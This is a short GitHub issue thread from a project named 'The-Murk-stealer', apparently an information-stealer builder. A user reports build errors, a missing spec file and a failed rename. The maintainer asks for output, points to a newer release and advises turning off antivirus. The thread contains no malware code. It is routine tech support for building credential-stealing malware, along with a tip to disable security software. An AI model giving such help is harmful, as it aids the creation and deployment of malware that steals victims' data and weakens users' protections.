### ISSUE TITLE
Missing file 

### ISSUE THREAD

**Issue by Xelf0487** [Nick-Vinesmoke/The-Murk-stealer#117]
I was trying to use the "TheMurkBuilder.exe" after trying to build it it gives me an error that i'm missing files.
The file thats missing is "TheMurk.spec"
+ 2 errors:
1. Failed to rename dist to built
2. Faild to built

Any tips?

**Comment by Nick-Vinesmoke** [comment]
can u show me the output

**Comment by ptricksosad** [comment]
Please help me as soon as possible, thank you!

**Comment by Nick-Vinesmoke** [comment]
> Please help me as soon as possible, thank you!

?

**Comment by Nick-Vinesmoke** [comment]
try the new release https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v9.3.2

**Comment by Nick-Vinesmoke** [comment]
> I was trying to use the "TheMurkBuilder.exe" after trying to build it it gives me an error that i'm missing files. The file thats missing is "TheMurk.spec"
> 
> * 2 errors:
> 
> 1. Failed to rename dist to built
> 2. Faild to built
> 
> Any tips?

try to turn off av
